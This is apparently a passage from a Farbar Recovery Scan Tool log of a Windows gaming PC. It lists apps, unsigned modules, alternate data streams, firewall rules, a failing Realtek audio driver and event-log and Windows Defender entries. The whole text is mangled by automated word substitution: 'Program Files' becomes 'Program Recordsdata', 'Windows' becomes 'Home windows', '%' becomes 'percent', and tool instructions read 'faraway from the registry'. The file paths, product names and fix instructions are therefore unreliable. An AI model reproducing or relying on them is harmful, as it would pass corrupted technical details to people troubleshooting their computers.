iTunes -> C:Program FilesWindowsAppsAppleInc.iTunes_12124.1.57017.0_x64__nzyj5cx40ttqa [2022-06-26] (Apple Inc.) [Startup Task]
Microsoft Promoting SDK for XAML -> C:Program FilesWindowsAppsMicrosoft.Promoting.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2022-06-26] (Microsoft Company) [MS Ad]
Microsoft Promoting SDK for XAML -> C:Program FilesWindowsAppsMicrosoft.Promoting.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2022-06-26] (Microsoft Company) [MS Ad]
Netflix -> C:Program FilesWindowsApps4DF9E0F8.Netflix_6.98.1805.0_x64__mcm4njqhnhss8 [2022-06-26] (Netflix, Inc.)
NVIDIA Management Panel -> C:Program FilesWindowsAppsNVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-06-26] (NVIDIA Corp.)
Pictures Media Engine Add-on -> C:Program FilesWindowsAppsMicrosoft.Pictures.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-06-26] (Microsoft Company)
Realtek Audio Management -> C:Program FilesWindowsAppsRealtekSemiconductorCorp.RealtekAudioControl_1.3.183.0_x64__dt26b99r8h8gj [2022-06-26] (Realtek Semiconductor Corp)
Whole PC Cleaner – Free Disk Area Clear Up, Optimize Reminiscence & Home windows System -> C:Program FilesWindowsApps64404Softuna.TotalDiskCleaner_2.1.8.0_x64__r1b4jsc7ddp3p [2022-07-09] (Whole PC Cleaner)

==================== Customized CLSID (Whitelisted): ==============

(If an entry is included within the fixlist, it is going to be faraway from the registry. The file is not going to be moved until listed individually.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:Program FilesWinRARrarext.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:Program FilesWinRARrarext32.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:Program FilesMalwarebytesAnti-Malwarembshlext.dll [2022-07-06] (Malwarebytes Inc. -> Malwarebytes)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:WINDOWSSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_c43eff7079c4c90cnvshext.dll [2022-06-08] (Nvidia Company -> NVIDIA Company)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:Program FilesMalwarebytesAnti-Malwarembshlext.dll [2022-07-06] (Malwarebytes Inc. -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:Program FilesWinRARrarext.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:Program FilesWinRARrarext32.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

(If an entry is included within the fixlist, the registry merchandise can be restored to default or eliminated. The file is not going to be moved.)

HKLM…Drivers32: [VIDC.RTV1] => C:Windowssystem32rtvcvfw64.dll [246272 2012-09-28] () [File not signed]
HKLM…Drivers32: [VIDC.RTV1] => C:WindowsSysWOW64rtvcvfw32.dll [247296 2012-09-28] () [File not signed]
HKLM…Drivers32: [vidc.VP60] => C:WindowsSysWOW64vp6vfw.dll [447752 2014-09-16] (Digital Arts -> On2.com)
HKLM…Drivers32: [vidc.VP61] => C:WindowsSysWOW64vp6vfw.dll [447752 2014-09-16] (Digital Arts -> On2.com)

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2022-06-08 19:25 – 2022-06-08 01:33 – 000151040 _____ () [File not signed] ?C:Program FilesLGHUBresourcesapp.asar.unpackednode_moduleskeytarbuildReleasekeytar.node
2022-07-10 00:52 – 2022-07-10 00:52 – 000165888 _____ () [File not signed] ?C:UsersXoloAppDataLocalTempa9d23b8-0095-4989-82f1-a9b6d5a29784.tmp.node
2022-07-10 00:52 – 2022-07-10 00:52 – 000640000 _____ () [File not signed] ?C:UsersXoloAppDataLocalTemp2ea2d5f6-a2fd-47fb-aeae-4c5541693fc9.tmp.node
2022-07-10 00:52 – 2022-07-10 00:52 – 000638464 _____ () [File not signed] ?C:UsersXoloAppDataLocalTempeaf356ea-6abb-4e08-a452-d4f2a20d39e8.tmp.node
2022-06-29 17:25 – 2022-06-29 17:25 – 104871424 _____ () [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560libcef.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000112128 _____ () [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560libegl.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 006227456 _____ () [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560libglesv2.dll
2020-03-07 07:35 – 2020-02-24 13:09 – 000009728 _____ () [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALcm-hook.dll
2020-03-07 07:35 – 2020-02-24 13:09 – 002107392 _____ () [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALCMUOT.dll
2020-03-07 07:35 – 2020-02-03 14:59 – 000014336 _____ () [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALhidapi.dll
2020-03-07 07:35 – 2020-02-05 11:03 – 000192000 _____ () [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALOledDataConvert.dll
2021-08-20 10:16 – 2021-08-20 10:16 – 001867776 _____ () [File not signed] C:Program Recordsdata (x86)GIGABYTEAppCenterBDR_info.dll
2022-05-26 15:49 – 2022-05-25 16:18 – 002126848 _____ () [File not signed] C:Program Recordsdata (x86)Wonderful Coreffmpeg.dll
2022-05-26 15:49 – 2022-05-25 16:18 – 000109056 _____ () [File not signed] C:Program Recordsdata (x86)Wonderful Corelibegl.dll
2022-05-26 15:49 – 2022-05-25 16:18 – 005103616 _____ () [File not signed] C:Program Recordsdata (x86)Wonderful Corelibglesv2.dll
2021-10-04 19:20 – 2022-04-13 22:11 – 000015360 _____ () [File not signed] C:Program Recordsdata (x86)OriginlibEGL.DLL
2021-10-04 19:20 – 2022-04-13 22:11 – 003090944 _____ () [File not signed] C:Program Recordsdata (x86)OriginlibGLESv2.dll
2020-03-27 01:11 – 2022-03-03 21:23 – 126965248 _____ () [File not signed] C:Program Recordsdata (x86)Steambincefcef.win7x64libcef.dll
2020-03-27 01:11 – 2021-11-17 06:38 – 000384000 _____ () [File not signed] C:Program Recordsdata (x86)Steambincefcef.win7x64libegl.dll
2020-03-27 01:11 – 2021-11-17 06:38 – 008006656 _____ () [File not signed] C:Program Recordsdata (x86)Steambincefcef.win7x64libglesv2.dll
2021-06-27 00:12 – 2021-06-27 00:12 – 000967168 _____ () [File not signed] C:Program Recordsdata (x86)VBVoicemeetermp3lamelame_enc.dll
2020-03-07 07:35 – 2019-08-19 12:08 – 000060416 _____ (Chicony Electronics Co., Ltd.) [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALaudiobox.dll
2021-11-05 18:07 – 2021-11-05 18:07 – 000236544 _____ (GIGA-BYTE TECHNOLOGY CO., LTD.) [File not signed] C:Program Recordsdata (x86)GIGABYTEAppCenteryccV3.dll
2021-11-05 17:07 – 2021-11-05 17:07 – 000236544 _____ (GIGA-BYTE TECHNOLOGY CO., LTD.) [File not signed] C:Program Recordsdata (x86)GigabyteEasyTuneEngineServiceyccV3.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000810496 _____ (The Chromium Authors) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560chrome_elf.dll
2020-03-27 01:11 – 2022-03-03 21:23 – 000983552 _____ (The Chromium Authors) [File not signed] C:Program Recordsdata (x86)Steambincefcef.win7x64chrome_elf.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000002560 _____ (The ICU Venture) [File not signed] C:Program Recordsdata (x86)Originicudt58.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 001252864 _____ (The ICU Venture) [File not signed] C:Program Recordsdata (x86)Originicuuc58.dll
2021-10-04 19:20 – 2022-04-13 22:11 – 001282048 _____ (The OpenSSL Venture, hxxp://www.openssl.org/) [File not signed] C:Program Recordsdata (x86)OriginLIBEAY32.dll
2021-07-10 22:04 – 2022-04-13 22:11 – 000279040 _____ (The OpenSSL Venture, hxxp://www.openssl.org/) [File not signed] C:Program Recordsdata (x86)Originssleay32.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000030208 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)Originimageformatsqgif.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000032768 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)Originimageformatsqico.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000256512 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)Originimageformatsqjpeg.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000026112 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)Originimageformatsqtga.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000305152 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)Originimageformatsqtiff.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000025600 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)Originimageformatsqwbmp.dll
2021-10-04 19:20 – 2022-04-13 22:11 – 001611264 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)Originplatformsqwindows.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 005487104 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Core.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 005841920 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Gui.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000709120 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Multimedia.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 001179136 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Network.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000207360 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Positioning.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000310272 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5PrintSupport.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 003513344 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Qml.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 003390976 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Quick.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000068096 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5QuickWidgets.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000045568 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5TextToSpeech.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000116224 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5WebChannel.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 054071296 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5WebEngineCore.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000211456 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5WebEngineWidgets.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000146432 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5WebSockets.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 005089792 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Widgets.dll
2022-06-10 01:32 – 2022-04-13 22:11 – 000184832 _____ (The Qt Firm Ltd) [File not signed] C:Program Recordsdata (x86)OriginQt5Xml.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000047104 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560audioqtaudio_windows.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000026112 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560imageformatsqgif.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000027136 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560imageformatsqico.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000243712 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560imageformatsqjpeg.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000223744 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560imageformatsqmng.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000020992 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560imageformatsqsvg.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 000332288 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560imageformatsqtiff.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 001140224 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560platformsqwindows.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 004943360 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Core.dll
2022-06-29 17:25 – 2022-06-29 17:25 – 005022208 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Gui.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 000626176 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Multimedia.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 000877056 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Network.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 002908672 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Qml.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 003078656 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Quick.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 000259072 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Svg.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 004718080 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Widgets.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 000439296 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5WinExtras.dll
2022-06-29 17:26 – 2022-06-29 17:26 – 000159232 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)Battle.netBattle.internet.13560Qt5Xml.dll
2020-03-07 07:35 – 2019-08-19 12:08 – 001097216 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALplatformsqwindows.dll
2020-03-07 07:35 – 2019-08-19 12:08 – 004779008 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALQt5Core.dll
2020-03-07 07:35 – 2019-08-19 12:08 – 004969472 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALQt5Gui.dll
2020-03-07 07:35 – 2019-08-19 12:08 – 004468224 _____ (The Qt Firm Ltd.) [File not signed] C:Program Recordsdata (x86)CoolerMasterPORTALQt5Widgets.dll
2015-10-14 01:15 – 2015-10-14 01:15 – 002042368 _____ (TODO: <Firm identify>) [File not signed] C:Program Recordsdata (x86)GIGABYTEAppCenterosvi.dll

==================== Alternate Knowledge Streams (Whitelisted) ========

(If an entry is included within the fixlist, solely the ADS can be eliminated.)

AlternateDataStreams: C:ProgramDataDisplaySessionContainer1.log:F107EE40EF [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer1.log_backup1:2DD1EC5C91 [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer2.log:CCB2353F35 [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer2.log_backup1:0544EFE2DB [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer3.log:8A1F56CED6 [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer3.log_backup1:A473474DD2 [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer4.log:3B2EC2BDEF [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer4.log_backup1:DC5D04D24A [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer5.log:84BD5AAA09 [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer5.log_backup1:038079845B [10]
AlternateDataStreams: C:ProgramDataDisplaySessionContainer6.log:4C1811BCCA [10]
AlternateDataStreams: C:ProgramDataMicrosoft.SqlServer.Compact.400.32.bc:169D67954B [10]
AlternateDataStreams: C:ProgramDataMicrosoftWindowsStart Menudesktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:ProgramDataMicrosoftWindowsStart MenuProgramsEpic Video games Launcher.lnk:BE32D07BC5 [10]
AlternateDataStreams: C:ProgramDataMicrosoftWindowsStart MenuProgramsStreamlabs OBS.lnk:5BF9B01493 [10]

==================== Secure Mode (Whitelisted) ==================

(If an entry is included within the fixlist, it is going to be faraway from the registry. The “AlternateShell” can be restored.)

HKLMSYSTEMCurrentControlSetControlSafeBootMinimal1445319.sys => “”=”Driver”
HKLMSYSTEMCurrentControlSetControlSafeBootMinimalEsgShKernel => “”=”Service”
HKLMSYSTEMCurrentControlSetControlSafeBootMinimalMBAMService => “”=”Service”
HKLMSYSTEMCurrentControlSetControlSafeBootNetwork1445319.sys => “”=”Driver”
HKLMSYSTEMCurrentControlSetControlSafeBootNetworkMBAMService => “”=”Service”

==================== Affiliation (Whitelisted) =================

==================== Web Explorer (Whitelisted) ==========

BHO: GBHO.BHO -> {45d30484-7ded-43d9-957a-d2fd1f046511} -> C:Windowssystem32mscoree.dll [2019-12-07] (Microsoft Home windows -> Microsoft Company)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:Program FilesJavajre1.8.0_241binssv.dll [2020-03-30] (Oracle America, Inc. -> Oracle Company)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:Program FilesJavajre1.8.0_241binjp2ssv.dll [2020-03-30] (Oracle America, Inc. -> Oracle Company)
Toolbar: HKLM – Sensible Backup – {1d09c093-f71e-43c3-b948-19316cbd695e} – C:Windowssystem32mscoree.dll [2019-12-07] (Microsoft Home windows -> Microsoft Company)

==================== Hosts content material: =========================

(If wanted Hosts: directive could possibly be included within the fixlist to reset Hosts.)

2019-03-18 23:49 – 2019-03-18 23:49 – 000000824 _____ C:WINDOWSsystem32driversetchosts

==================== Different Areas ===========================

(At the moment there isn’t a computerized repair for this part.)

HKLMSystemCurrentControlSetControlSession ManagerEnvironmentPath -> C:Program Recordsdata (x86)Widespread FilesOracleJavajavapath;C:Windowssystem32;C:Home windows;C:WindowsSystem32Wbem;C:WindowsSystem32WindowsPowerShellv1.0;C:WindowsSystem32OpenSSH;C:Program Recordsdata (x86)NVIDIA CorporationPhysXCommon;C:Program FilesNVIDIA CorporationNVIDIA NvDLISR;C:Program Recordsdata (x86)IntelIntel® Administration Engine ComponentsDAL;C:Program FilesIntelIntel® Administration Engine ComponentsDAL;%SystemRootpercentsystem32;%SystemRoot%;%SystemRootpercentSystem32Wbem;%SYSTEMROOTpercentSystem32WindowsPowerShellv1.0;%SYSTEMROOTpercentSystem32OpenSSH
HKUS-1-5-21-3474202653-3316422791-2388774026-1001Control PanelDesktopWallpaper -> C:UsersXoloAppDataRoamingMicrosoftWindowsThemesTranscodedWallpaper
DNS Servers: 1.1.1.1 – 8.8.8.8
HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorer => (SmartScreenEnabled: )
Home windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled objects ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included within the fixlist, it is going to be faraway from the registry. The file is not going to be moved until listed individually.)

FirewallRules: [TCP Query User{4B111615-B947-43D9-96A7-C6656EE90C8D}C:program files (x86)steamsteam.exe] => (Permit) C:program recordsdata (x86)steamsteam.exe (Valve Corp. -> Valve Company)
FirewallRules: [UDP Query User{CF27B28A-9796-4143-83BB-D8DAE676AC4B}C:program files (x86)steamsteam.exe] => (Permit) C:program recordsdata (x86)steamsteam.exe (Valve Corp. -> Valve Company)
FirewallRules: [TCP Query User{0B0D8EF0-5171-4194-B69F-D86B816242E8}C:program fileshphp officejet 4630 seriesbinhpnetworkcommunicatorcom.exe] => (Permit) C:program fileshphp officejet 4630 seriesbinhpnetworkcommunicatorcom.exe (HP Inc. -> Hewlett-Packard Improvement Firm, LP)
FirewallRules: [UDP Query User{CDC43929-9F99-4DFA-95D8-45D16A26184A}C:program fileshphp officejet 4630 seriesbinhpnetworkcommunicatorcom.exe] => (Permit) C:program fileshphp officejet 4630 seriesbinhpnetworkcommunicatorcom.exe (HP Inc. -> Hewlett-Packard Improvement Firm, LP)
FirewallRules: [TCP Query User{C90D6254-5BAA-4B40-BF90-43FEE266ED55}C:program fileslghublghub_agent.exe] => (Permit) C:program fileslghublghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{E89BD2C4-BBE6-403D-97A9-BC44DE59A071}C:program fileslghublghub_agent.exe] => (Permit) C:program fileslghublghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{35D8BEA1-A1BD-45E8-AAF8-1D51ED8A5138}] => (Permit) C:Program Recordsdata (x86)Steambincefcef.win7x64steamwebhelper.exe (Valve Corp. -> Valve Company)
FirewallRules: [{0EEAD967-2098-4A37-AF18-7A92DD263CBF}] => (Permit) C:Program Recordsdata (x86)Steambincefcef.win7x64steamwebhelper.exe (Valve Corp. -> Valve Company)
FirewallRules: [{315EE535-448A-4075-8CB3-F0BDF720057E}] => (Permit) LPort=9009
FirewallRules: [{5C570685-1E3F-4449-AC36-EA0117D8BC19}] => (Permit) LPort=9009

==================== Restore Factors =========================

05-07-2022 21:10:31 Scheduled Checkpoint
07-07-2022 21:42:45 Home windows Modules Installer
09-07-2022 19:03:48 Eliminated Microsoft GameInput

==================== Defective System Supervisor Units ============

Identify: Realtek® Audio
Description: Realtek Excessive Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Producer: Realtek
Service: IntcAzAudAddService
Downside: : Home windows can not load the gadget driver for this {hardware}. The motive force could also be corrupted or lacking. (Code 39)
Decision: Causes for this error embody a driver that isn’t current; a binary file that’s corrupt; a file I/O drawback, or a driver that references an entry level in one other binary file that might not be loaded.
Uninstall the driving force, after which click on “Scan for {hardware} adjustments” to reinstall or improve the driving force.

==================== Occasion log errors: ========================

Utility errors:
==================
Error: (07/10/2022 12:51:26 AM) (Supply: VSS) (EventID: 13) (Consumer: )
Description: Quantity Shadow Copy Service data: The COM Server with CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} and identify CEventSystem can’t be began. [0x8007045b, A system shutdown is in progress.
]

Error: (07/10/2022 12:51:26 AM) (Supply: VSS) (EventID: 8193) (Consumer: )
Description: Quantity Shadow Copy Service error: Surprising error calling routine CoCreateInstance.  hr = 0x8007045b, A system shutdown is in progress.
.

Error: (07/10/2022 12:51:26 AM) (Supply: VSS) (EventID: 13) (Consumer: )
Description: Quantity Shadow Copy Service data: The COM Server with CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} and identify CEventSystem can’t be began. [0x8007045b, A system shutdown is in progress.
]

Error: (07/10/2022 12:51:21 AM) (Supply: WTabletServicePro) (EventID: 1) (Consumer: )
Description: Occasion-ID 1

Error: (07/10/2022 12:51:14 AM) (Supply: WTabletServicePro) (EventID: 1) (Consumer: )
Description: Occasion-ID 1

Error: (07/09/2022 10:54:01 PM) (Supply: WTabletServicePro) (EventID: 1) (Consumer: )
Description: Occasion-ID 1

Error: (07/09/2022 08:45:52 PM) (Supply: Utility Error) (EventID: 1000) (Consumer: )
Description: Faulting utility identify: Nss.exe, model: 4.6.1.179, time stamp: 0x5c66fe49
Faulting module identify: MSVCR110.dll, model: 11.0.51106.1, time stamp: 0x5098858e
Exception code: 0xc0000409
Fault offset: 0x000a326c
Faulting course of id: 0x14e8
Faulting utility begin time: 0x01d893fea73d374e
Faulting utility path: C:Program Recordsdata (x86)Norton Safety ScanEngine4.6.1.179Nss.exe
Faulting module path: C:Program Recordsdata (x86)Norton Safety ScanEngine4.6.1.179MSVCR110.dll
Report Id: 4671279d-d3e7-4444-8623-6c9fd21e2801
Faulting package deal full identify:
Faulting package-relative utility ID:

Error: (07/09/2022 08:29:56 PM) (Supply: Utility Error) (EventID: 1000) (Consumer: )
Description: Faulting utility identify: ScanToPCActivationApp.exe, model: 32.4.116.28592, time stamp: 0x61a61953
Faulting module identify: combase.dll, model: 10.0.19041.1741, time stamp: 0xafbf9ef6
Exception code: 0xc0000005
Fault offset: 0x0000000000080ea4
Faulting course of id: 0x22d8
Faulting utility begin time: 0x01d893fb88e39581
Faulting utility path: C:Program FilesHPHP Officejet 4630 seriesBinScanToPCActivationApp.exe
Faulting module path: C:WINDOWSSystem32combase.dll
Report Id: b2d6c904-74bf-4ece-96a9-f133fe01450f
Faulting package deal full identify:
Faulting package-relative utility ID:

System errors:
=============
Error: (07/10/2022 12:51:56 AM) (Supply: Service Management Supervisor) (EventID: 7000) (Consumer: )
Description: The RtkAudioUniversalService service failed to start out as a result of following error:
The system can not discover the file specified.

Error: (07/10/2022 12:00:12 AM) (Supply: Service Management Supervisor) (EventID: 7000) (Consumer: )
Description: The RtkAudioUniversalService service failed to start out as a result of following error:
The system can not discover the file specified.

Error: (07/09/2022 11:56:27 PM) (Supply: Service Management Supervisor) (EventID: 7034) (Consumer: )
Description: The Intuit Replace Service v4 service terminated unexpectedly.  It has finished this 1 time(s).

Error: (07/09/2022 11:56:27 PM) (Supply: Service Management Supervisor) (EventID: 7031) (Consumer: )
Description: The Logi Facecam Service service terminated unexpectedly.  It has finished this 1 time(s).  The next corrective motion can be taken in 2000 milliseconds: Restart the service.

Error: (07/09/2022 11:56:27 PM) (Supply: Service Management Supervisor) (EventID: 7034) (Consumer: )
Description: The Gservice service terminated unexpectedly.  It has finished this 1 time(s).

Error: (07/09/2022 11:56:27 PM) (Supply: Service Management Supervisor) (EventID: 7034) (Consumer: )
Description: The Steam Consumer Service service terminated unexpectedly.  It has finished this 1 time(s).

Error: (07/09/2022 11:56:27 PM) (Supply: Service Management Supervisor) (EventID: 7031) (Consumer: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly.  It has finished this 1 time(s).  The next corrective motion can be taken in 6000 milliseconds: Restart the service.

Error: (07/09/2022 11:56:27 PM) (Supply: Service Management Supervisor) (EventID: 7034) (Consumer: )
Description: The GIGABYTE Modify service terminated unexpectedly.  It has finished this 1 time(s).

Home windows Defender:
================
Date: 2022-07-10 00:52:29
Description:
C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe has been blocked from modifying %userprofilepercentFootage by Managed Folder Entry.
Detection time: 2022-07-10T05:52:29.147Z
Path: %userprofilepercentFootage
Course of Identify: C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe
Safety intelligence Model: 1.369.867.0
Engine Model: 1.1.19300.2
Product Model: 4.18.2205.7

Date: 2022-07-10 00:00:40
Description:
C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe has been blocked from modifying %userprofilepercentFootage by Managed Folder Entry.
Detection time: 2022-07-10T05:00:40.415Z
Path: %userprofilepercentFootage
Course of Identify: C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe
Safety intelligence Model: 1.369.867.0
Engine Model: 1.1.19300.2
Product Model: 4.18.2205.7

Date: 2022-07-09 23:24:46
Description:
C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe has been blocked from modifying %userprofilepercentFootage by Managed Folder Entry.
Detection time: 2022-07-10T04:24:46.011Z
Path: %userprofilepercentFootage
Course of Identify: C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe
Safety intelligence Model: 1.369.867.0
Engine Model: 1.1.19300.2
Product Model: 4.18.2205.7

Date: 2022-07-09 22:51:30
Description:
C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe has been blocked from modifying %userprofilepercentFootage by Managed Folder Entry.
Detection time: 2022-07-10T03:51:30.235Z
Path: %userprofilepercentFootage
Course of Identify: C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe
Safety intelligence Model: 1.369.867.0
Engine Model: 1.1.19300.2
